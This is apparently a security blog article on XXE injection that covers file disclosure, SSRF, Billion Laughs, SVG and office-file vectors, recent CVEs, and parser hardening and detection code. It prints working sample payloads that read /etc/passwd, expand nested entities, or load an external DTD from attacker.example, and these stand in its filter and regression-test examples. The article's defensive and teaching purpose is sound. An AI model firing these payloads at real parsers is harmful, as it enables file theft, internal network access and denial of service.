XML External Entity (XXE): The Legacy Vulnerability That Still Haunts Modern Apps 📄

Introduction: The “Old” Threat That Refuses to Die

In the rapidly evolving landscape of cybersecurity, where new vulnerabilities emerge daily, XML External Entity (XXE) injection stands as a stark reminder that legacy threats can be just as dangerous as cutting-edge exploits. Despite being well-documented for over a decade, XXE vulnerabilities continue to plague modern applications in 2025, with recent high-profile discoveries proving that even major technology companies aren’t immune.

In early 2025, security researchers discovered a critical XXE vulnerability in Akamai CloudTest that allowed attackers to access server files and exfiltrate sensitive data like the /etc/passwd file. Similarly, CVE-2025-23195 exposed an XXE vulnerability in the Ambari/Oozie project that could be exploited to read arbitrary files or perform server-side request forgery attacks. These recent incidents underscore a troubling reality: organizations continue to deploy XML parsers with insecure default configurations, leaving applications vulnerable to attacks that were preventable years ago.

Understanding XXE: A Technical Deep Dive

What is XXE Injection?

XML External Entity injection is a web security vulnerability that allows attackers to interfere with an application’s processing of XML data by exploiting how XML parsers handle external entities. External entities are custom XML entities whose values are loaded from outside the Document Type Definition (DTD), allowing them to reference local file paths or URLs.

The fundamental issue stems from the XML specification itself. The XML processor replaces occurrences of external entities with content retrieved from the system identifier, which can be a file path or URL. When an application fails to properly configure its XML parser, attackers can manipulate this mechanism to access resources that should remain protected.

The Anatomy of an XXE Attack

A basic XXE payload demonstrates the simplicity yet effectiveness of this attack:

<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

When the XML parser processes this payload without proper security controls, it resolves the external entity and injects the system file content directly into the XML output, potentially exposing operating system-level data without requiring any credentials.
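
To make the mechanism concrete, here is a minimal sketch that lists the entity declarations a document carries without fetching any of them. It uses Python's standard-library `xml.parsers.expat` module, which reports declarations through a callback and does not retrieve external entities unless the caller installs a handler to do so. The function name `list_entity_declarations` is an illustrative assumption, not part of any library.

```python
from xml.parsers import expat


def list_entity_declarations(xml_text):
    """Return (name, system_id, is_parameter) for each entity declared in the DTD.

    Nothing is fetched: expat only reports the declarations it encounters.
    """
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        found.append((name, system_id, bool(is_parameter)))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


payload = """<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>"""

print(list_entity_declarations(payload))
```

The system identifier in the result is exactly what a permissive parser would go and read on the attacker's behalf.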

The Three Pillars of XXE Exploitation

1. File Disclosure Attacks: The Information Goldmine

File disclosure attacks allow adversaries to access local system files through malicious XML entities, revealing sensitive information including configuration files, password files, and application source code. This capability can turn what looks like a simple parsing flaw into a foothold for wider compromise, because leaked credentials and keys are often reusable elsewhere.

Attackers typically target high-value files such as:

- /etc/passwd and, when the parser runs with enough privilege, /etc/shadow on Unix systems
- Windows system and application files (for example, web.config)
- Application configuration files containing database credentials
- Cloud metadata endpoints (AWS, Azure, GCP), reached by URL rather than file path
- Private SSH keys and SSL certificates

The danger extends beyond simple file reading. Attackers can perform out-of-band data exfiltration by reading local files and transmitting the contents to remote servers they control.

2. Server-Side Request Forgery (SSRF): Breaking Internal Boundaries

XXE vulnerabilities can be leveraged to perform SSRF attacks, where the server-side application is induced to make HTTP requests to any URL that the server can access. This capability is particularly dangerous in cloud environments and internal networks.

Through SSRF exploitation via XXE, attackers can:

- Probe internal network infrastructure and map internal systems
- Access cloud metadata services to steal credentials
- Bypass firewall rules and access restricted internal APIs
- Pivot from external-facing systems to internal resources

GeoServer’s recent CVE-2025-30220 vulnerability demonstrated how XXE could be exploited to trick the application into making HTTP requests to internal or arbitrary external systems, highlighting the continued relevance of this attack vector.

3. Denial of Service: The Billion Laughs Attack

The “Billion Laughs” attack uses nested entity declarations, each referencing the previous one several times, so that the content grows exponentially during parsing, consuming massive amounts of memory and potentially crashing systems. Unlike the other two attack classes, it needs no external entity at all, only internal ones. This attack is particularly dangerous because the payload itself is small, but the expansion during parsing can completely overwhelm server resources.

A typical Billion Laughs payload creates nested entity definitions that expand exponentially:

<!DOCTYPE root [
  <!ENTITY e "e">
  <!ENTITY e1 "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
  <!ENTITY e2 "&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;&e1;">
  <!ENTITY e3 "&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;&e2;">
]>
<root>&e3;</root>

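The three levels shown here expand to only 1,000 characters. The classic payload uses nine such levels, which yields a billion copies of the base string and can consume gigabytes of memory, bringing production systems to their knees.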
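
The growth is easy to quantify. The sketch below assumes every level references the level beneath it the same number of times; `expanded_length` is a hypothetical helper written for this illustration.

```python
def expanded_length(levels, fan_out=10, base_length=1):
    """Characters produced when the top-level entity is fully expanded.

    Each level references the one below it `fan_out` times, so the size
    multiplies by `fan_out` once per level.
    """
    return base_length * fan_out ** levels


for levels in (3, 6, 9):
    print(levels, expanded_length(levels))
```

With a fan-out of ten, every additional level multiplies the output by ten, which is why a payload of under a kilobyte can demand gigabytes from the parser.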

Why SOAP APIs Remain Ground Zero for XXE

The SOAP-XML Dependency

SOAP APIs almost universally rely on XML parsing, which exposes them to XXE and XPath injection whenever the parser or query layer is misconfigured. Unlike modern REST APIs that primarily use JSON, SOAP’s strict adherence to XML creates an expanded attack surface that many organizations fail to properly secure.

SOAP continues to power critical operations across finance, healthcare, and government sectors due to its reliability, auditability, and transactional integrity. This widespread use in high-value systems makes SOAP endpoints prime targets for sophisticated attackers.

The Akamai CloudTest Case Study

The recent discovery of CVE-2025-49493 in Akamai CloudTest revealed that multiple SOAP endpoints under /concerto/services were vulnerable to XXE attacks. Security researchers found that most endpoints in this path shared the same vulnerability, demonstrating how a single misconfiguration can expose an entire service infrastructure.

The Akamai case is instructive because it demonstrates several key points:

- Systematic exposure: When one SOAP endpoint is vulnerable, often multiple endpoints share the same flaw
- Delayed discovery: Despite being a major technology provider, the vulnerability persisted until 2025
- Real-world impact: Attackers could access sensitive server files and environment variables

The vulnerability was ultimately fixed by disabling DTD processing entirely at the parser level, preventing XXE attacks at their source.

Legacy Systems and Technical Debt

Many SOAP APIs remain stagnant, running on outdated libraries and frameworks that were last updated a decade ago. The risk is not limited to XXE: recent research revealed that XML Signature Wrapping (XSW) vulnerabilities in Germany’s Personal Health Record system could be exploited to circumvent authentication, demonstrating the real-world consequences of flaws in XML processing.

The problem is compounded by the fact that SOAP services often operate deep within organizational infrastructure:

- Core banking systems processing millions of transactions
- Healthcare systems managing patient records
- Supply chain integrations connecting multiple enterprises
- Legacy government systems that cannot be easily replaced

File Upload Features: The Overlooked Attack Vector

SVG Files as XXE Carriers

Some common file formats use XML or contain XML subcomponents, with SVG being a primary example. An application might allow users to upload images and process them on the server, but if the image processing library supports SVG format, attackers can submit malicious SVG images to reach hidden XXE attack surfaces.

A malicious SVG file can contain XXE payloads disguised as legitimate image markup:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ 
  <!ENTITY xxe SYSTEM "file:///etc/hostname"> 
]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

When this SVG is processed, the contents of sensitive files can be displayed directly within the rendered image, making detection more difficult.

Second-Order XXE: The Delayed Threat

Second-order XXE injections represent a more sophisticated variant where malicious payloads are first stored and only later retrieved and parsed, often by a different component. These vulnerabilities are particularly prevalent in import/export features that run asynchronously, where user-supplied XML files are queued for background processing.

This delayed execution model creates several challenges:

- Traditional security testing may not trigger the vulnerability
- The injection point and execution context are separated
- Payloads can persist in databases or file systems
- Attribution becomes more difficult

Beyond SVG: Other XML-Based File Formats

Document viewers and converters that process XML-based documents like DOCX and XLSX files represent common targets for XXE exploitation. Modern office document formats are essentially ZIP archives containing XML files. When applications extract and parse these XML components without proper validation, they become vulnerable to XXE attacks.
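
As a rough illustration of a pre-parse check for such containers, the sketch below opens an uploaded archive in memory and flags any XML part that declares a DOCTYPE. It is a heuristic under stated assumptions: parts are UTF-8 encoded (a UTF-16 part would need decoding first), only the first 64 KiB of each part is inspected, and the name `find_doctype_parts` is hypothetical.

```python
import io
import zipfile


def find_doctype_parts(archive_bytes):
    """Return names of XML parts inside a ZIP container that declare a DOCTYPE."""
    suspicious = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            # Heuristic: look only at the first 64 KiB of each part.
            with archive.open(info) as part:
                head = part.read(64 * 1024)
            if b"<!DOCTYPE" in head:
                suspicious.append(info.filename)
    return suspicious


def build_demo_archive():
    """Create a tiny in-memory archive with one clean and one hostile part."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        archive.writestr("word/document.xml", "<document/>")
        archive.writestr(
            "docProps/core.xml",
            '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><x>&xxe;</x>',
        )
    return buffer.getvalue()


print(find_doctype_parts(build_demo_archive()))
```

Legitimate office documents have no reason to carry a DOCTYPE, so rejecting any upload that this check flags should cost little. It complements parser hardening rather than replacing it.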

Even audio files can be exploited, as demonstrated by CVE-2021-29447 in WordPress, where WAV files uploaded to the Media Library had their embedded XML metadata parsed by the bundled getID3 library in a way that allowed XXE on sites running PHP 8.

Why XXE Persists in 2025: Root Causes

Default Insecure Parser Configurations

Many XML parsers have historically resolved external entities by default, so a server will fetch whatever file or URL a malicious document names unless the parser is explicitly configured otherwise. XXE does not execute code by itself; the damage comes from what the parser can read or reach. This “insecure by default” design choice creates a situation where developers must actively harden their parsers rather than benefiting from secure defaults.

Invisible XML Processing

Some REST APIs are unintentionally configured to accept data in multiple formats, including XML, even when developers assume they’re only handling JSON. Applications may accept Content-Type: application/xml or automatically convert between formats, creating hidden XXE attack surfaces that developers aren’t aware exist.
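
One way to close this gap is to allowlist media types explicitly at the edge of the application. The sketch below is framework-agnostic and assumes a JSON-only API; `ALLOWED_MEDIA_TYPES` and `is_allowed_content_type` are illustrative names.

```python
# Assumption for this sketch: the API is meant to accept JSON and nothing else.
ALLOWED_MEDIA_TYPES = {"application/json"}


def is_allowed_content_type(header_value):
    """Accept a request only if its media type is explicitly allowlisted."""
    if not header_value:
        return False
    # Drop parameters such as "; charset=utf-8" and normalise case.
    media_type = header_value.split(";", 1)[0].strip().lower()
    return media_type in ALLOWED_MEDIA_TYPES


for value in ("application/json; charset=utf-8", "application/xml", "text/xml"):
    print(value, is_allowed_content_type(value))
```

Rejecting everything that is not on the list means an XML body never reaches a parser that the team did not know was there.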

Complex Application Architectures

Web applications can contain numerous components, each potentially including an XML parser, making it difficult to ascertain which parts of the application process XML. In some cases, application owners have no access to the configuration of XML parsers used by specific third-party components.

Modern applications often integrate:

- Multiple microservices with their own XML parsers
- Third-party libraries and frameworks
- Legacy components with undocumented XML processing
- Cloud services that may accept XML inputs

False Sense of Security

The structured verbosity of XML creates an illusion of security, but the complexity of XML parsing actually introduces its own attack surface. It’s a dangerous fallacy to think that internal SOAP services operate safely simply because they reside behind a firewall.

Organizations often make flawed assumptions:

- “We only use JSON, so we’re safe from XXE”
- “Our XML endpoints are internal-only”
- “We disabled external entities years ago” (without verifying all parsers)
- “Our WAF protects against XXE attacks”

Advanced XXE Techniques: Bypassing Defenses

Blind XXE Exploitation

Many XXE vulnerabilities are blind: the application does not return the values of defined external entities in its responses, so server-side files cannot be read directly. Blind XXE can still be detected and exploited in two ways: out-of-band techniques that make the parser send data to an attacker-controlled server, and deliberately triggered XML parsing errors whose messages disclose sensitive information.

External DTD Bypass

When security filters block the file:// protocol, attackers can declare their DTD in an external file to bypass filtering entirely. By crafting XXE payloads that make vulnerable applications reach out to attacker-controlled servers to load malicious DTD files, they can execute payloads without specifying blocked protocols directly.
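
A toy comparison shows why scheme blocklists fail here. Both filters below are deliberately simplistic string checks written for this illustration, and `attacker.example` is a placeholder host; neither function is meant as a production control.

```python
def naive_filter_allows(payload):
    """A blocklist that only looks for the file:// scheme (deliberately weak)."""
    return "file://" not in payload.lower()


def strict_filter_allows(payload):
    """Refuse any document that carries a DOCTYPE at all."""
    return "<!DOCTYPE" not in payload


direct = '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><r>&xxe;</r>'
# The file:// reference lives in the remotely hosted DTD, not in the request.
external = '<!DOCTYPE r SYSTEM "http://attacker.example/evil.dtd"><r/>'

for name, payload in (("direct", direct), ("external DTD", external)):
    print(name, naive_filter_allows(payload), strict_filter_allows(payload))
```

The naive filter stops the direct payload but lets the external DTD variant through, while refusing DOCTYPE outright stops both. That is the reasoning behind disabling DTD processing in the parser instead of pattern-matching on input.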

Parameter Entity Exploitation

Parameter entities can be used to bypass protections and filters that block regular external entities. This technique involves defining parameter entities within external DTDs, which are then processed to construct the final attack payload.

Comprehensive Defense Strategies

Parser-Level Hardening

XML parsers should be configured with security-first settings that include disabling Document Type Definition (DTD) processing when not required. For most applications, completely disabling DTD processing is the most effective defense:

For Java applications:

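import javax.xml.parsers.DocumentBuilderFactory;

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Reject any document that contains a DOCTYPE; this blocks XXE and entity expansion.
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defense in depth in case DOCTYPE support is ever re-enabled.
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);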

For .NET applications:

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;

For PHP applications:

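// Deprecated as of PHP 8.0, where libxml 2.9.0+ disables external entity loading by default; needed only on older versions.
libxml_disable_entity_loader(true);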
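
For Python services, which the snippets above do not cover, a comparable effect can be sketched with the standard library alone. This is a minimal two-pass illustration, not a definitive implementation: `parse_untrusted` and `DoctypeForbidden` are hypothetical names, and in practice many teams reach for the third-party `defusedxml` package instead.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def parse_untrusted(xml_text):
    """Parse XML only if it has no DOCTYPE; return the root Element."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = on_doctype
    checker.Parse(xml_text, True)   # first pass: raises on any DOCTYPE
    return ET.fromstring(xml_text)  # second pass: build the tree


print(parse_untrusted("<root>ok</root>").text)
try:
    parse_untrusted('<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/hostname">]><r>&x;</r>')
except DoctypeForbidden as error:
    print("rejected:", error)
```

Because the check raises as soon as the DOCTYPE is seen, entity declarations are never processed, which mirrors the "disallow DOCTYPE" setting in the Java and .NET examples.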

Input Validation and Sanitization

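Validation should reject documents that contain a DOCTYPE, external entity declarations, or unexpected entity references before any schema validation runs, because schema validation alone does not stop the parser from resolving entities. Documents should then be validated against schemas to ensure they match expected formats before processing.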

Implement whitelist-based validation:

- Define allowed XML structures and reject deviations
- Strip DOCTYPE declarations before processing
- Validate against known-good schemas
- Reject XML containing entity declarations
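
The "define allowed structures and reject deviations" step can be sketched as a small recursive check. The message shape in `ALLOWED_CHILDREN` is a made-up example, `structure_errors` is a hypothetical helper, and the sketch assumes the document has already been parsed by a parser that refuses DOCTYPE declarations.

```python
import xml.etree.ElementTree as ET

# Hypothetical message shape: <order> may contain only <id> and <quantity>.
ALLOWED_CHILDREN = {"order": {"id", "quantity"}, "id": set(), "quantity": set()}


def structure_errors(element, allowed=ALLOWED_CHILDREN):
    """Return a list of deviations from the allowed element structure."""
    if element.tag not in allowed:
        return [f"unexpected element <{element.tag}>"]
    errors = []
    for child in element:
        if child.tag not in allowed[element.tag]:
            errors.append(f"<{child.tag}> not allowed inside <{element.tag}>")
        else:
            errors.extend(structure_errors(child, allowed))
    return errors


good = ET.fromstring("<order><id>7</id><quantity>2</quantity></order>")
bad = ET.fromstring("<order><id>7</id><note>x</note></order>")
print(structure_errors(good))
print(structure_errors(bad))
```

A real deployment would more likely express the same rules as an XSD or similar schema; the point is that anything outside the expected shape is rejected, not repaired.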

Network-Level Controls

Network segmentation should be deployed to isolate XML processing systems from sensitive internal resources, limiting the potential impact of XXE attacks. This defense-in-depth approach includes:

Placing XML-processing services in DMZ networks
Restricting outbound connections from XML parsers
Implementing strict egress filtering
Blocking access to cloud metadata endpoints (169.254.169.254)
Monitoring unusual file access patterns and network requests
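
The egress rules above can be approximated in application code as well. The sketch below classifies a destination URL using only the standard library; `is_blocked_destination` is a hypothetical helper, and it only evaluates literal IP addresses. A hostname has to be resolved and re-checked by the caller, which this sketch does not attempt.

```python
import ipaddress
from urllib.parse import urlsplit


def is_blocked_destination(url):
    """True if the URL uses a non-HTTP(S) scheme or a literal internal IP address."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return True  # file://, ftp://, gopher:// and similar are refused outright
    host = parts.hostname
    if host is None:
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname: resolve it and check the resulting address separately
    return address.is_private or address.is_loopback or address.is_link_local


for url in (
    "file:///etc/passwd",
    "http://169.254.169.254/latest/meta-data/",
    "http://10.0.0.5/admin",
    "https://8.8.8.8/",
):
    print(url, is_blocked_destination(url))
```

Application-level checks like this are a backstop. The network-layer controls listed above remain the stronger guarantee, since they apply even when a parser is misconfigured.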

Application Architecture Improvements

Architectural controls should limit where XML is parsed and what the parsing process can reach. Note that Content Security Policy is a browser-side mechanism and does not restrict server-side XML parsers. Modern application architectures should:

Minimize XML usage in favor of JSON where possible
Isolate XML processing to dedicated, hardened services
Implement least-privilege access controls
Use secure XML processing libraries with frequent updates
Conduct regular security audits of XML-handling code

Development Pipeline Integration

XXE vulnerability testing should be integrated into continuous integration and deployment pipelines to ensure that new code changes do not introduce vulnerabilities. This includes:

Static Application Security Testing (SAST) to identify insecure parser configurations
Dynamic Application Security Testing (DAST) to detect runtime XXE vulnerabilities
Software Composition Analysis (SCA) to track vulnerable XML libraries
Security-focused code reviews for all XML-handling modifications
Automated regression testing for XXE vulnerabilities
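
An automated regression check can be as small as a fixed set of payloads that every XML entry point must reject. The sketch below assumes each entry point can be wrapped as a function that raises on hostile input; the payload set, `accepted_payloads`, and the placeholder host `attacker.example` are illustrative.

```python
XXE_REGRESSION_PAYLOADS = {
    "external-general-entity": (
        '<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><r>&xxe;</r>'
    ),
    "external-dtd": '<!DOCTYPE r SYSTEM "http://attacker.example/evil.dtd"><r/>',
    "nested-entities": (
        '<!DOCTYPE r [<!ENTITY a "aa"><!ENTITY b "&a;&a;">]><r>&b;</r>'
    ),
}


def accepted_payloads(parse):
    """Return the names of payloads that `parse` accepted instead of rejecting."""
    accepted = []
    for name, payload in XXE_REGRESSION_PAYLOADS.items():
        try:
            parse(payload)
        except Exception:
            continue  # rejection is the desired outcome
        accepted.append(name)
    return accepted


def reject_doctype(text):
    """Stand-in for a hardened entry point: refuses any DOCTYPE."""
    if "<!DOCTYPE" in text:
        raise ValueError("DOCTYPE not allowed")
    return text


print(accepted_payloads(reject_doctype))
```

In a pipeline, the build would fail whenever `accepted_payloads` returns a non-empty list for any real entry point, so a dependency upgrade that silently re-enables DTD processing is caught before release.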

Real-World Impact: Recent CVEs Tell the Story

CVE-2025-49493: Akamai CloudTest

This vulnerability demonstrated how SOAP services across multiple endpoints could share the same XXE flaw, allowing attackers to exfiltrate sensitive environment variables and system files. The incident highlighted the systemic nature of XXE vulnerabilities in enterprise SOAP infrastructure.

CVE-2025-23195: Apache Ambari

An XXE vulnerability in the Ambari/Oozie project occurred due to insecure parsing of XML input using the DocumentBuilderFactory class without disabling external entity resolution. This case demonstrates how even well-established open-source projects can harbor XXE vulnerabilities.

CVE-2025-30220: GeoServer WFS Service

This high-severity vulnerability in GeoServer stemmed from improper handling of XML schemas within the GeoTools library, bypassing entity resolution controls and creating attack vectors through WFS endpoints. The vulnerability affected a widely-deployed geospatial server, underscoring XXE’s reach into specialized application domains.

Industry-Specific Challenges

Healthcare Systems

The migration of Electronic Health Records to the cloud has raised concerns about patient privacy, necessitating robust authentication and XML security controls. Healthcare systems face unique challenges:

Legacy HL7 interfaces and FHIR implementations that exchange XML
HIPAA compliance requirements for data protection
Integration with multiple third-party systems
24/7 availability requirements limiting patching windows

Financial Services

Core banking systems rely on SOAP for complex, high-assurance transactions where reliability and transactional integrity are non-negotiable. Financial institutions must balance:

Real-time transaction processing requirements
Regulatory compliance mandates
Integration with legacy mainframe systems
Zero-downtime upgrade constraints

Government Infrastructure

Government systems present particularly challenging XXE risks due to:

- Decades-old SOAP-based systems that cannot be easily replaced
- Multi-vendor integration requirements
- Strict certification and accreditation processes
- Budget constraints limiting modernization efforts
- High-value targets for nation-state adversaries

Monitoring and Detection

Logging and Alerting

Comprehensive logging and monitoring should be implemented to detect potential XXE attack attempts, including unusual file access patterns and network requests. Effective monitoring includes:

Tracking all XML parsing operations
Alerting on DOCTYPE declarations in untrusted input
Monitoring file system access from XML parser processes
Detecting unusual outbound connections from application servers
Correlating security events across multiple layers

Indicators of Compromise

Organizations should monitor for:

- XML payloads containing SYSTEM or PUBLIC keywords
- Requests to cloud metadata endpoints (169.254.169.254)
- Access to sensitive system files from web application processes
- Large XML documents or deeply nested structures
- Error messages revealing file paths or internal system details
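
Several of these indicators can be matched directly against logged request bodies. The patterns below are a starting-point sketch, not a complete signature set; `INDICATORS` and `find_indicators` are hypothetical names, and the sketch assumes bodies are available as decoded text.

```python
import re

INDICATORS = {
    "doctype": re.compile(r"<!DOCTYPE", re.IGNORECASE),
    "external-entity": re.compile(
        r"<!ENTITY\s+(?:%\s+)?[\w.:-]+\s+(?:SYSTEM|PUBLIC)\b"
    ),
    "metadata-endpoint": re.compile(r"169\.254\.169\.254"),
    "sensitive-path": re.compile(r"file://|/etc/(?:passwd|shadow)"),
}


def find_indicators(request_body):
    """Return the sorted names of all indicators present in a request body."""
    return sorted(
        name for name, pattern in INDICATORS.items() if pattern.search(request_body)
    )


sample = (
    '<!DOCTYPE r [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>'
    "<r>&xxe;</r>"
)
print(find_indicators(sample))
```

Matches are best treated as signals to correlate with file-access and outbound-connection logs, since attackers can encode payloads in ways that simple patterns miss.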

The Path Forward: Evolving Beyond XXE

Adopting Modern Data Formats

Organizations should evaluate opportunities to migrate from XML to JSON or other modern formats that don’t carry the same inherent security risks. While not always feasible for legacy systems, new development should default to safer alternatives.

Security Awareness and Training

True security begins before the code—in assumptions, in architecture, and in culture. Development teams need:

Regular training on XXE and other injection vulnerabilities
Security champions within engineering teams
Secure coding guidelines specific to XML handling
Threat modeling sessions for XML-processing features

Vendor Security Requirements

When procuring software or services, organizations should:

- Require vendors to demonstrate XXE protections
- Include XXE testing in acceptance criteria
- Mandate secure XML parser configurations
- Request regular security assessments and penetration tests

Conclusion: An “Old” Threat With Modern Consequences

XXE vulnerabilities represent a paradox in modern cybersecurity: a well-understood, thoroughly documented vulnerability that continues to compromise systems in 2025. Recent CVEs affecting major technology companies and open-source projects demonstrate that XXE remains a critical threat despite decades of awareness.

The persistence of XXE vulnerabilities stems from multiple factors: insecure parser defaults, complex application architectures, legacy system constraints, and the invisible nature of XML processing in modern applications. SOAP APIs continue to power critical operations in finance, healthcare, and government, making their security paramount. File upload features, particularly those processing SVG and other XML-based formats, create additional attack surfaces that developers frequently overlook.

The solution requires a multi-layered approach: hardening XML parsers, implementing robust input validation, deploying network segmentation, integrating security testing into development pipelines, and fostering a security-conscious culture. Organizations cannot afford to dismiss XXE as a “legacy” vulnerability—the 2025 threat landscape proves it remains very much alive.

As we move forward, the lesson is clear: in cybersecurity, “old” doesn’t mean “irrelevant.” The fundamentals matter, and failing to address well-known vulnerabilities like XXE can have devastating consequences, regardless of how sophisticated an organization’s other security measures might be. The haunting of modern applications by XXE will continue until the industry collectively commits to secure-by-default configurations and comprehensive defense strategies.
